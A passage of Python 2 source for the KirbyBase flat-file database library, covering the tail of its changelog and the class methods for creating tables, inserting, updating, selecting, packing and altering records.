to '', I was letting it stay that way, when I should really be
converting it to None before returning the result set.
-Cleaned up the internals a bit. Mainly, I tried to use functions
in the operator module like lt and ge instead of hardcoding < and
>= in an if statement.
2005-04-26: Version 1.8.1 released.
-Added the ability to select, update, delete multiple records by
specifying a list of record numbers.
-Cleaned up the internals of _getMatchesByRecno by not splitting
the record line into fields if user is selecting all records, and
by using a generator to return matches instead of building a list
of matches and returning the whole list.
2005-05-03: Version 1.8.2 released.
-Emergency bug-fix release: Fred Pacquier's eagle eyes spotte a bug
I introducted in version 1.8.1. It's in _getMatchByRecno. If you
are selecting all records, KirbyBase is not getting rid of the
newline character attached to the last field of the record.
Thanks Fred Pacquier!
2005-09-19: Version 1.9 released.
-Fixed a bug that can occur on very fast machines when sending data
between the client and the server. Thanks to David Edwards for
this fix.
-Added a method, setDefaultReturnType, that allows you to, set the
default return type of results from the select method. The default
is still 'list', but you can set it to 'list', 'object', or 'dict'.
Thanks to David Edwards for this suggested enhancement.
-Added methods addFields and dropFields. These allow you to add new
columns to a table and remove existing columns from the table.
Thanks to Pierre Quentel for the code for these two enhancements.
"""
import re
import socket
import os.path
import datetime
import cPickle
import cStringIO
import operator
import tempfile
import shutil
#--------------------------------------------------------------------------
# KirbyBase Class
#--------------------------------------------------------------------------
class KirbyBase:
"""Database Management System.
Public Methods:
__init__ - Create an instance of database.
close - Close database.
create - Create a table.
insert - Insert a record into a table.
insertBatch - Insert a list of records into a table.
update - Update a table.
delete - Delete record(s) from a table.
select - select record(s) from a table.
pack - remove deleted records from a table.
validate - validate data in table records.
drop - Remove a table.
getFieldNames - Get a list of a table's field names.
getFieldTypes - Get a list of a table's field types.
addFields - Insert new column(s) into table.
dropFields - Remove column(s) from table.
len - Total number of records in table.
setDefaultReturnType - Set the default return type for selects.
"""
#----------------------------------------------------------------------
# PUBLIC METHODS
#----------------------------------------------------------------------
#----------------------------------------------------------------------
# init
#----------------------------------------------------------------------
def __init__(self, type='local', host=None, port=None):
"""Create an instance of the database and return a reference to it.
Keyword Arguments:
type - Connection type: local(default), client, or server.
host - IP address of server to connect to, if connection type
is client.
port - Port number of server to connect to, if connection type
is client.
"""
self.connect_type = type
# Regular expression used to determine if field needs to be
# encoded.
self.encodeRegExp = re.compile(r'\n|\r|\032|\|')
# Regular expression used to determine if field needs to be
# un-encoded.
self.unencodeRegExp = re.compile(
r'&linefeed;|&carriage_return;|&substitute;|&pipe;')
# This will be used to validate the select statements.
self.cmpFuncs = {"<":operator.lt, "<=":operator.le,
">=":operator.ge, ">":operator.gt, "==":operator.eq,
"!=":operator.ne, "<>":operator.ne}
# This will be used to validate and convert the field types in
# the header rec of the table into valid python types.
self.strToTypes = {'int':int, 'Integer':int, 'float':float,
'Float':float, 'datetime.date':datetime.date,
'Date':datetime.date, 'datetime.datetime':datetime.datetime,
'DateTime':datetime.datetime, 'bool':bool, 'Boolean':bool,
'str':str, 'String':str}
# If connecting as client, open a socket connection with server.
if self.connect_type == 'client':
self.host, self.port = host, port
# Default select return type to list.
self.def_return_type = 'list'
#----------------------------------------------------------------------
# close
#----------------------------------------------------------------------
def close(self):
"""Close connection to database server.
"""
if self.connect_type == 'client':
self.dbSock.close()
#----------------------------------------------------------------------
# create
#----------------------------------------------------------------------
def create(self, name, fields):
"""Create a new table and return True on success.
Arguments:
name - physical filename, including path, that will hold
table.
fields - list holding strings made up of multiple fieldname,
fieldtype pairs (i.e. ['plane:str','speed:int']).
Valid fieldtypes are: str, int, float, datetime.date,
datetime.datetime, bool or, for compatibility with
the Ruby version of KirbyBase use String, Integer,
Float, Date, DateTime, and Boolean.
Returns True if no exceptions are raised.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.create('%s',%s)" %(name,fields))
# Check to see if file already exists.
if os.path.exists(name):
raise KBError(name + ' already exists!')
# Validate field types. Integer, String, Float, Date, DateTime, and
# Boolean types are compatible between the Ruby and Python versions
# of KirbyBase.
for x in [y.split(':')[1] for y in fields]:
if x not in self.strToTypes:
raise KBError('Invalid field type: %s' % x)
# Make copy of fields list so that value passed in is not changed.
# Add recno counter, delete counter, and recno field definition at
# beginning.
header_rec = list(['000000','000000','recno:int'] + fields)
# Open the table in write mode since we are creating it new, write
# the header record to it and close it.
fptr = self._openTable(name, 'w')
fptr.write('|'.join(header_rec) + '\n')
self._closeTable(fptr)
# Return success.
return True
#----------------------------------------------------------------------
# insert
#----------------------------------------------------------------------
def insert(self, name, values):
"""Insert a new record into table, return unique record number.
Arguments:
name - physical file name, including path, that holds table.
values - list, dictionary, or object containing field values
of new record.
Returns unique record number assigned to new record when it is
created.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
# I put this code when I added the ability to use a record
# object for the values argument. The problem was that, if the
# user specified a record object, things worked ok in embedded
# mode. However, in client/server mode, I could not figure out
# a good way to send the record object to the server because it
# is embedded in a string representation of the database
# command (i.e. "db.insert('plane', recordObject)"). So, what
# I did to get it working was, I check to see if values is a
# record object. If it is, I grab the object's internal
# dictionary (__dict__) that holds all of the attributes and I
# send this as part of the expression string, instead of
# sending the object itself.
if not isinstance(values, (list, dict)):
return self._sendSocket("db.insert('%s',%s)" %(name,
values.__dict__))
else:
return self._sendSocket("db.insert('%s',%s)" %(name,values))
# Open the table.
fptr = self._openTable(name, 'r+')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# If values is a dictionary or an object, we are going to convert
# it into a list. That way, we can use the same validation and
# updating routines regardless of whether the user passed in a
# dictionary, an object, or a list. This returns a copy of
# values so that we are not messing with the original values.
record = self._convertInput(values)
# Check input fields to make sure they are valid.
self._validateUpdateCriteria(record, self.field_names[1:])
try:
# Get a new record number.
rec_no = self._incrRecnoCounter(fptr)
# Add record number to front of record.
record.insert(0, rec_no)
# Append the new record to the end of the table and close the
# table. Run each field through encoder to take care of
# special characters.
self._writeRecord(fptr, 'end', '|'.join(map(self._encodeString,
[str(item) for item in record])))
finally:
self._closeTable(fptr)
# Return the unique record number created for this new record.
return rec_no
#----------------------------------------------------------------------
# insertBatch
#----------------------------------------------------------------------
def insertBatch(self, name, batchRecords):
"""Insert a batch of records into table, return a list of rec #s.
Arguments:
name - physical file name, including path, that holds
table.
batchRecords - list of records. Each record can be a list, a
dictionary, or an object containing field values
of new record.
Returns list of unique record numbers assigned.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.insertBatch('%s',%s)" %(name,
batchRecords))
# Open the table, update the instance variables holding table
# header info and close table.
fptr = self._openTable(name, 'r')
self._updateHeaderVars(fptr)
self._closeTable(fptr)
# Create an empty list to hold the batch after it has been
# validated and any records within it that are in dictionary format
# have been converted to list format.
records = []
for values in batchRecords:
# If values is a dictionary or an object, we are going to
# convert it into a list. That way, we can use the same
# validation and updating routines regardless of whether the
# user passed in a dictionary, an object, or a list. This
# returns a copy of values so that we are not messing with the
# original values.
record = self._convertInput(values)
# Check input fields to make sure they are valid.
self._validateUpdateCriteria(record, self.field_names[1:])
# Add the validated (and possibly converted) record to the
# records list.
records.append(record)
# Create empty list to hold new record numbers.
rec_nos = []
# Open the table again, this time in read-write mode.
fptr = self._openTable(name, 'r+')
try:
# Now that the batch has been validated, add it to the database
# table.
for record in records:
# Get a new record number.
rec_no = self._incrRecnoCounter(fptr)
# Add record number to front of record.
record.insert(0, rec_no)
# Append the new record to the end of the table. Run each
# field through encoder to take care of special characters.
self._writeRecord(fptr, 'end', '|'.join(
map(self._encodeString, [str(item) for item in record])))
# Add the newly create record number to the list of that we
# we return back to the user.
rec_nos.append(rec_no)
finally:
self._closeTable(fptr)
# Return the unique record number created for this new record.
return rec_nos
#----------------------------------------------------------------------
# update
#----------------------------------------------------------------------
def update(self, name, fields, searchData, updates, filter=None,
useRegExp=False):
"""Update record(s) in table, return number of records updated.
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to search on. If
any of the items in this list is 'recno', then the
table will be searched by the recno field only and
will update, at most, one record, since recno is
the system generated primary key.
searchData - list containing actual data to search on. Each
item in list corresponds to item in the 'fields'
list.
updates - list, dictionary, or object containing actual data
to put into table field. If it is a list and
'filter' list is empty or equal to None, then
updates list must have a value for each field in
table record.
filter - only used if 'updates' is a list. This is a
list containing names of fields to update. Each
item in list corresponds to item in the 'updates'
list. If 'filter' list is empty or equal to None,
and 'updates' is a list, then 'updates' list must
have an item for each field in table record,
excepting the recno field.
useRegExp - if true, match string fields using regular
expressions, else match string fields using
strict equality (i.e. '=='). Defaults to true.
Returns integer specifying number of records that were updated.
Example:
db.update('plane.tbl',['country','speed'],['USA','>400'],
[1230],['range'])
This will search for any plane from the USA with a speed
greater than 400mph and update it's range to 1230 miles.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
# I put this code when I added the ability to use a record
# object for the updates argument. The problem was that, if the
# user specified a record object, things worked ok in embedded
# mode. However, in client/server mode, I could not figure out
# a good way to send the record object to the server because it
# is embedded in a string representation of the database
# command (i.e. "db.update('plane', ['recno'], [45],
# recordObject)"). So, what I did to get it working was, I
# check to see if updates is a record object. If it is, I grab
# the object's internal dictionary (__dict__) that holds all of
# the attributes and I send this as part of the expression
# string, instead of sending the object itself.
if not isinstance(updates, (list, dict)):
return self._sendSocket("db.update('%s',%s,%s,%s,%s,%s)"
%(name, fields, searchData, updates.__dict__, filter,
useRegExp))
else:
return self._sendSocket("db.update('%s',%s,%s,%s,%s,%s)"
%(name, fields, searchData, updates, filter, useRegExp))
# Make copy of searchData list so that value passed in is not
# changed if I edit it in validateMatchCriteria.
patterns = list(searchData)
# Open the table.
fptr = self._openTable(name, 'r+')
# Update the instance variables holding table header info.
self._updateHeaderVars(fptr)
# If no update filter fields were specified, that means user wants
# to update all field in record, so we set the filter list equal
# to the list of field names of table, excluding the recno field,
# since user is not allowed to update recno field.
if filter:
if isinstance(updates, list):
pass
# If updates is a dictionary, user cannot specify a filter,
# because the keys of the dictionary will function as the
# filter.
elif isinstance(updates, dict):
raise KBError('Cannot specify filter when updates is a ' +
'dictionary.')
else:
raise KBError('Cannot specify filter when updates is an ' +
'object.')
else:
# If updates is a list and no update filter
# fields were specified, that means user wants to update
# all fields in record, so we set the filter list equal
# to the list of field names of table, excluding the recno
# field, since user is not allowed to update recno field.
if isinstance(updates, list): filter = self.field_names[1:]
# If updates is a list, do nothing because it is already in the
# proper format and filter has either been supplied by the user
# or populated above.
if isinstance(updates, list): pass
# If updates is a dictionary, we are going to convert it into an
# updates list and a filters list. This will allow us to use the
# same routines for validation and updating.
elif isinstance(updates, dict):
filter = [k for k in updates.keys() if k in
self.field_names[1:]]
updates = [updates[i] for i in filter]
# If updates is an object, we are going to convert it into an
# updates list and a filters list. This will allow us to use the
# same routines for validation and updating.
else:
filter = [x for x in self.field_names[1:] if hasattr(updates,x)]
updates = [getattr(updates,x) for x in self.field_names[1:] if
hasattr(updates,x)]
try:
# Check input arguments to make sure they are valid.
self._validateMatchCriteria(fields, patterns)
self._validateUpdateCriteria(updates, filter)
except KBError:
# If something didn't check out, close the table and re-raise
# the error.
fptr.close()
raise
# Search the table and populate the match list.
match_list = self._getMatches(fptr, fields, patterns, useRegExp)
# Create a list with each member being a list made up of a
# fieldname and the corresponding update value, converted to a
# safe string.
filter_updates = zip(filter,
[self._encodeString(str(u)) for u in updates])
updated = 0
# Step through the match list.
for line, fpos in match_list:
# Create a copy of the current record.
new_record = line.strip().split('|')
# For each filter field, apply the updated value to the
# table record.
for field, update in filter_updates:
new_record[self.field_names.index(field)] = update
# Convert the updated record back into a text line so we
# can write it back out to the file.
new_line = '|'.join(new_record)
# Since we are changing the current record, we will first
# write over it with all blank spaces in the file.
self._deleteRecord(fptr, fpos, line)
# If the updated copy of the record is not bigger than the
# old copy, then we can just write it in the same spot in
# the file. If it is bigger, then we will have to append
# it to the end of the file.
if len(new_line) > len(line):
self._writeRecord(fptr, 'end', new_line)
# If we didn't overwrite the current record, that means
# we have another blank record (i.e. delete record) out
# there, so we need to increment the deleted records
# counter.
self._incrDeleteCounter(fptr)
else:
self._writeRecord(fptr, fpos, new_line)
updated+=1
# Close the table.
self._closeTable(fptr)
# Return the number of records updated.
return updated
#----------------------------------------------------------------------
# delete
#----------------------------------------------------------------------
def delete(self, name, fields, searchData, useRegExp=False):
"""Delete record(s) from table, return number of records deleted.
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to search on. if
any of the items in this list is 'recno', then the
table will be searched by the recno field only and
will delete, at most, one record, since recno is
the system generated primary key.
searchData - list containing actual data to search on. Each
item in list corresponds to item in the 'fields'
list.
useRegExp - if true, match string fields using regular
expressions, else match string fields using
strict equality (i.e. '=='). Defaults to true.
Returns integer specifying number of records that were deleted.
Example:
db.delete('plane.tbl',['country','speed'],['USA','>400'])
This will search for any plane from the USA with a speed
greater than 400mph and delete it.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.delete('%s',%s,%s,%s)"
%(name,fields, searchData, useRegExp))
# Make copy of searchData list so that value passed in is not
# changed if I edit it in validateMatchCriteria.
patterns = list(searchData)
# Open the table.
fptr = self._openTable(name, 'r+')
# Update the instance variables holding table header info.
self._updateHeaderVars(fptr)
try:
# Check input arguments to make sure they are valid.
self._validateMatchCriteria(fields, patterns)
except KBError:
# If something didn't check out, close the table and re-raise
# the error.
fptr.close()
raise
# Search the table and populate the match list.
match_list = self._getMatches(fptr, fields, patterns, useRegExp)
deleted = 0
# Delete any matches found.
for line, fpos in match_list:
self._deleteRecord(fptr, fpos, line)
# Increment the delete counter.
self._incrDeleteCounter(fptr)
deleted+=1
# Close the table.
self._closeTable(fptr)
# Return the number of records deleted.
return deleted
#----------------------------------------------------------------------
# select
#----------------------------------------------------------------------
def select(self, name, fields, searchData, filter=None,
useRegExp=False, sortFields=[], sortDesc=[], returnType=None,
rptSettings=[0,False]):
"""Select record(s) from table, return list of records selected.
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to search on.
If any of the items in this list is 'recno',
then the table will be searched by the recno
field only and will select, at most, one record,
since recno is the system generated primary key.
searchData - list containing actual data to search on. Each
item in list corresponds to item in the
'fields' list.
filter - list containing names of fields to include for
selected records. If 'filter' list is empty or
equal to None, then all fields will be included
in result set.
useRegExp - if true, match string fields using regular
expressions, else match string fields using
strict equality (i.e. '=='). Defaults to False.
sortFields - list of fieldnames to sort on. Each must be a
valid field name, and, if filter list is not
empty, the same fieldname must be in the filter
list. Result set will be sorted in the same
order as fields appear in sortFields in
ascending order unless the same field name also
appears in sortDesc, then they will be sorted in
descending order.
sortDesc - list of fieldnames that you want to sort result
set by in descending order. Each field name
must also be in sortFields.
returnType - a string specifying the type of the items in the
returned list. Can be 'list' (items are lists
of values), 'dict' (items are dictionaries with
keys = field names and values = matching
values), 'object' (items = instances of the
generic Record class) or 'report' (result set
is formatted as a table with a header, suitable
for printing). Defaults to None. If None, the
instance variable def_return_type will be used.
rptSettings - a list with two elements. This is only used if
returnType is 'report'. The first element
specifies the number of records to print on each
page. The default is 0, which means do not do
any page breaks. The second element is a
boolean specifying whether to print a row
separator (a line of dashes) between each
record. The default is False.
Returns list of records matching selection criteria.
Example:
db.select('plane.tbl',['country','speed'],['USA','>400'])
This will search for any plane from the USA with a speed
greater than 400mph and return it.
"""
# Check returnType argument to make sure it is either 'list',
# 'dict', or 'object'.
if returnType not in [None, 'list', 'dict', 'object', 'report']:
raise KBError('Invalid return type: %s' % returnType)
# If user did not specify a return type, use whatever the default
# return type is set to.
if returnType == None:
returnType = self.def_return_type
# Check rptSettings list to make sure it's items are valid.
if type(rptSettings[0]) != int:
raise KBError('Invalid report setting: %s' % rptSettings[0])
if type(rptSettings[1]) != bool:
raise KBError('Invalid report setting: %s' % rptSettings[1])
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket(
"db.select('%s',%s,%s,%s,%s,%s,%s,'%s',%s)"
%(name, fields, searchData, filter, useRegExp, sortFields,
sortDesc, returnType, rptSettings))
# Make copy of searchData list so that value passed in is not
# changed if I edit it in validateMatchCriteria.
patterns = list(searchData)
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info.
self._updateHeaderVars(fptr)
try:
# Check input arguments to make sure they are valid.
self._validateMatchCriteria(fields, patterns)
if filter: self._validateFilter(filter)
else: filter = self.field_names
except KBError:
# If something didn't check out, close the table and re-raise
# the error.
fptr.close()
raise
# Validate sort field argument. It needs to be one of the field
# names included in the filter.
for field in [sf for sf in sortFields if sf not in filter]:
raise KBError('Invalid sort field specified: %s' % field)
# Make sure any fields specified in sort descending list are also
# in sort fields list.
for field in [sf for sf in sortDesc if sf not in sortFields]:
raise KBError('Cannot specify a field to sort in descending ' +
'order if you have not specified that field as a sort field')
# Search table and populate match list.
match_list = self._getMatches(fptr, fields, patterns, useRegExp)
# Initialize result set.
result_set = []
# Get a list of filter field indexes (i.e., where in the
# table record is the field that the filter item is
# referring to.
filterIndeces = [self.field_names.index(x) for x in filter]
# For each record in match list, add it to the result set.
for record, fpos in match_list:
# Initialize a record to hold the filtered fields of
# the record.
result_rec = []
# Split the record line into it's fields.
fields = record.split('|')
# Step through each field index in the filter list. Grab the
# result field at that position, convert it to
# proper type, and put it in result set.
for i in filterIndeces:
# If the field is empty, just append it to the result rec.
if fields[i] == '':
result_rec.append(None)
# Otherwise, convert field to its proper type before
# appending it to the result record.
else:
result_rec.append(
self.convert_types_functions[i](fields[i]))
# Add the result record to the result set.
result_set.append(result_rec)
# Close the table.
self._closeTable(fptr)
# If a sort field was specified...
# I stole the following code from Steve Lucy. I got it from the
# ASPN Python Cookbook webpages. Thanks Steve!
if len(sortFields) > 0:
reversedSortFields = list(sortFields)
reversedSortFields.reverse()
for sortField in reversedSortFields:
i = filter.index(sortField)
result_set.sort( lambda x,y:
cmp(*[(x[i], y[i]), (y[i], x[i])]
[sortField in sortDesc]))
# If returnType is 'object', then convert each result record
# to a Record object before returning the result list.
if returnType == 'object':
return [Record(filter, rec) for rec in result_set]
# If returnType is 'dict', then convert each result record to
# a dictionary with the keys being the field names before returning
# the result list.
elif returnType == 'dict':
return [dict(zip(filter, rec)) for rec in result_set]
# If returnType is 'report', then return a pretty print version of
# the result set.
elif returnType == 'report':
# How many records before a formfeed.
numRecsPerPage = rptSettings[0]
# Put a line of dashes between each record?
rowSeparator = rptSettings[1]
delim = ' | '
# columns of physical rows
columns = apply(zip, [filter] + result_set)
# get the maximum of each column by the string length of its
# items
maxWidths = [max([len(str(item)) for item in column])
for column in columns]
# Create a string of dashes the width of the print out.
rowDashes = '-' * (sum(maxWidths) + len(delim)*
(len(maxWidths)-1))
# select the appropriate justify method
justifyDict = {str:str.ljust,int:str.rjust,float:str.rjust,
bool:str.ljust,datetime.date:str.ljust,
datetime.datetime:str.ljust}
# Create a string that holds the header that will print.
headerLine = delim.join([justifyDict[fieldType](item,width)
for item,width,fieldType in zip(filter,maxWidths,
self.field_types)])
# Create a StringIO to hold the print out.
output=cStringIO.StringIO()
# Variable to hold how many records have been printed on the
# current page.
recsOnPageCount = 0
# For each row of the result set, print that row.
for row in result_set:
# If top of page, print the header and a dashed line.
if recsOnPageCount == 0:
print >> output, headerLine
print >> output, rowDashes
# Print a record.
print >> output, delim.join([justifyDict[fieldType](
str(item),width) for item,width,fieldType in
zip(row,maxWidths,self.field_types)])
# If rowSeparator is True, print a dashed line.
if rowSeparator: print >> output, rowDashes
# Add one to the number of records printed so far on
# the current page.
recsOnPageCount += 1
# If the user wants page breaks and you have printed
# enough records on this page, print a form feed and
# reset records printed variable.
if numRecsPerPage > 0 and (recsOnPageCount ==
numRecsPerPage):
print >> output, '\f',
recsOnPageCount = 0
# Return the contents of the StringIO.
return output.getvalue()
# Otherwise, just return the list of lists.
else:
return result_set
#----------------------------------------------------------------------
# pack
#----------------------------------------------------------------------
def pack(self, name):
"""Remove blank records from table and return total removed.
Keyword Arguments:
name - physical file name, including path, that holds table.
Returns number of blank lines removed from table.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.pack('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Read in all records.
lines = fptr.readlines()
# Close the table so we can re-build it.
self._closeTable(fptr)
# Reset number of deleted records to zero.
header_rec = lines[0].split('|')
header_rec[1] = "000000"
# Set first line of re-built file to the header record.
lines[0] = '|'.join(header_rec)
# Open the table in write mode since we will be re-building it.
fptr = self._openTable(name, 'w')
# This is the counter we will use to report back how many blank
# records were removed.
lines_deleted = 0
# Step through all records in table, only writing out non-blank
# records.
for line in lines:
# By doing a rstrip instead of a strip, we can remove any
# extra spaces at the end of line that were a result of
# updating a record with a shorter one.
line = line.rstrip()
if line == "":
lines_deleted += 1
continue
try:
fptr.write(line + '\n')
except:
raise KBError('Could not write record in: ' + name)
# Close the table.
self._closeTable(fptr)
# Return number of records removed from table.
return lines_deleted
#----------------------------------------------------------------------
# validate
#----------------------------------------------------------------------
def validate(self, name):
"""Validate all records have field values of proper data type.
Keyword Arguments:
name - physical file name, including path, that holds table.
Returns list of records that have invalid data.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.validate('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# Create list to hold any invalid records that are found.
invalid_list = []
# Loop through all records in the table.
for line in fptr:
# Strip off newline character and any trailing spaces.
line = line[:-1].strip()
# If blank line, skip this record.
if line == "": continue
# Split the line up into fields.
record = line.split("|")
# Check the value of recno to see if the value is
# greater than the last recno assigned. If it is,
# add this to the invalid record list.
if self.last_recno < int(record[0]):
invalid_list.append([record[0], 'recno', record[0]])
# For each field in the record check to see if you
# can convert it to the field type specified in the
# header record by using the conversion function
# specified in self.convert_types_functions.
# If you can't convert it, add the
# record number, the field name, and the offending
# field value to the list of invalid records.
for i, item in enumerate(record):
if item == '': continue
try:
if self.convert_types_functions[i](item): pass
except:
invalid_list.append([record[0], self.field_names[i],
item])
# Close the table.
self._closeTable(fptr)
# Return list of invalid records.
return invalid_list
#----------------------------------------------------------------------
# drop
#----------------------------------------------------------------------
def drop(self, name):
"""Delete physical file containing table and return True.
Arguments:
name - physical filename, including path, that holds table.
Returns True if no exceptions are raised.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.drop('%s')" %(name))
# Delete physical file.
os.remove(name)
# Return success.
return True
#----------------------------------------------------------------------
# getFieldNames
#----------------------------------------------------------------------
def getFieldNames(self, name):
"""Return list of field names for specified table name
Arguments:
name - physical file name, including path, that holds table.
Returns list of field names for table.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.getFieldNames('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# Close the table.
self._closeTable(fptr)
return self.field_names
#----------------------------------------------------------------------
# getFieldTypes
#----------------------------------------------------------------------
def getFieldTypes(self, name):
"""Return list of field types for specified table name
Arguments:
name - physical file name, including path, that holds table.
Returns list of field types for table.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.getFieldTypes('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# Close the table.
self._closeTable(fptr)
return self.field_types
#----------------------------------------------------------------------
# addFields
#----------------------------------------------------------------------
def addFields(self, name, fields, after = ''):
"""Modify the table to insert new fields after the specified field,
or at the beginning if after is None
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to insert.
after - name of the field after which the new fields
will be inserted, or empty string to insert at
the beginning of the record
A temporary file is created, then copied into the old file
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.addFields('%s',%s,'%s')" %(name,
fields,after))
# Validate field types
for x in [y.split(':')[1] for y in fields]:
if x not in self.strToTypes:
raise KBError('Invalid field type: %s' % x)
# Validate the field given in "after"
field_names = self.getFieldNames(name)
if after and after not in field_names:
raise KBError('Invalid field name: %s' % after)
# index to insert the new fields
if not after:
insert_after = 0
else:
insert_after = field_names.index(after)
# build the modified fields list
old_fields = zip(field_names,self.getFieldTypes(name))
new_fields = []
for (n,t) in old_fields[1:]:
if t.__name__ in ['date','datetime']:
new_fields.append('%s:datetime.%s' %(n,t.__name__))
else:
new_fields.append('%s:%s' %(n,t.__name__))
new_fields = new_fields[:insert_after]+fields+ \
new_fields[insert_after:]
# Use tempfile to get a unique name for a temporary file
# to insert the records of the modified table
temp_file=tempfile.NamedTemporaryFile()
temp_name=temp_file.name
temp_file.close()
# Recreate the header line to go into the temp file.
header_rec = list(['%06d' % self.last_recno,
'%06d' % self.del_counter, 'recno:int'] + new_fields)
# copy old table into temporary one
in_file = open(name,'r')
in_file.readline() # skip first line
out_file = open(temp_name,'a')
# Write header rec to new file.
out_file.write('|'.join(header_rec) + '\n')
blank = ['']*len(fields)
# build the new file faster than with selects from old file
# and inserts in new one
for line in in_file:
recs = line[:-1].split('|')
recs = recs[:insert_after+1]+blank+recs[insert_after+1:]
out_file.write('|'.join(recs)+'\n')
out_file.close()
# copy temporary file into old file
shutil.copyfile(temp_name,name)
# delete temporary file
os.remove(temp_name)
return True
#----------------------------------------------------------------------
# dropFields
#----------------------------------------------------------------------
def dropFields(self, name, fields, after = ''):
"""Modify the table to drop the specified fields
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to drop.
A temporary file is created, then copied into the old file
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.dropFields('%s',%s)" %(name,fields))
# Validate the fields
if 'recno' in fields:
raise KBError("Can't drop the field 'recno'")
field_names = self.getFieldNames(name)
for field in fields:
if field not in field_names:
raise KBError('Invalid field name : %s' %field)
# build the modified fields list
old_fields = zip(field_names,self.getFieldTypes(name))
new_fields = []
dropped_indeces = []
for i,(n,t) in enumerate(old_fields[1:]):
if not n in fields:
if t.__name__ in ['date','datetime']:
new_fields.append('%s:datetime.%s' %(n,t.__name__))
else:
new_fields.append('%s:%s' %(n,t.__name__))
else:
dropped_indeces.append(i+1)
# Use tempfile to get a unique name for a temporary file
# to insert the records of the modified table
temp_file=tempfile.NamedTemporaryFile()
temp_name=temp_file.name
temp_file.close()
# Recreate the header rec to go into the temp file.
header_rec = list(['%06d' % self.last_recno,
'%06d' % self.del_counter, 'recno:int'] + new_fields)
# copy old table into temporary one
in_file = open(name,'r')
in_file.readline() # skip first line
out_file = open(temp_name,'a')
# Write header rec to new file.
out_file.write('|'.join(header_rec) + '\n')
# build the new file faster than with selects from old file
# and inserts in new one
for line in in_file:
recs = line[:-1].split('|')
new_recs = [ item for (i,item) in enumerate(recs) \
if not i in dropped_indeces]
out_file.write('|'.join(new_recs)+'\n')
out_file.close()
# copy temporary file into old file
shutil.copyfile(temp_name,name)
# delete temporary file
os.remove(temp_name)
return True
#----------------------------------------------------------------------
# len
#----------------------------------------------------------------------
def len(self, name):
'''Return total number of non-deleted records in specified table
Arguments:
name - physical file name, including path, that holds table.
Returns total number of records in table.
'''
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.len('%s')" %(name))
# Initialize counter.
rec_count = 0
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Skip header record.
line = fptr.readline()
# Loop through entire table.
line = fptr.readline()
while line:
# Strip off newline character.
line = line[0:-1]
# If not blank line, add 1 to record count.
if line.strip() != "": rec_count += 1
# Read next record.
line = fptr.readline()
# Close the table.
self._closeTable(fptr)
return rec_count
#----------------------------------------------------------------------
# setDefaultReturnType
#----------------------------------------------------------------------
def setDefaultReturnType(self, ret_type):
"""Set the default return type for selects.
"""
if ret_type not in ['list', 'dict', 'object', 'report']:
raise KBError('Invalid return type: %s' % ret_type)
self.def_return_type = ret_type
#----------------------------------------------------------------------
# PRIVATE METHODS
#----------------------------------------------------------------------
#----------------------------------------------------------------------
# _strToBool
#----------------------------------------------------------------------
def _strToBool(self, boolString):
if boolString == 'True': return True
elif boolString == 'False': return False
else: raise KBError('Invalid value for boolean: %s' % boolString)
#----------------------------------------------------------------------
# _strToDate
#----------------------------------------------------------------------
def _strToDate(self, dateString):
# Split the date string up into pieces and create a
# date object.
return datetime.date(*map(int, dateString.split('-')))
#----------------------------------------------------------------------
# _strToDateTime
#----------------------------------------------------------------------
def _strToDateTime(self, dateTimeString):
# Split datetime string into datetime portion microseconds portion.
tempDateTime = dateTimeString.split('.')
# Were there microseconds in the datetime string.
if len(tempDateTime) > 1: microsec = int(tempDateTime[1])
else: microsec = 0
# Now, split the datetime portion into a date
# and a time string. Take all of the pieces and
# create a datetime object.
tempDate, tempTime = tempDateTime[0].split(' ')
y, m, d = tempDate.split('-')
h, min, sec = tempTime.split(':')
return datetime.datetime(int(y),int(m),int(d),int(h),int(min),
int(sec),microsec)
#----------------------------------------------------------------------
# _encodeString
#----------------------------------------------------------------------
def _encodeString(self, s):
'''Encode a string.
Translates problem characters like \n, \r, and \032 to benign
character strings.
Keyword Arguments:
s - string to encode.
Returns encoded string.
'''
if self.encodeRegExp.search(s):
s = s.replace('\n', '&linefeed;')
s = s.replace('\r', '&carriage_return;')
s = s.replace('\032', '&substitute;')
s = s.replace('|', '&pipe;')
return s
#----------------------------------------------------------------------
# _unencodeString
#----------------------------------------------------------------------
def _unencodeString(self, s):
'''Unencode a string.
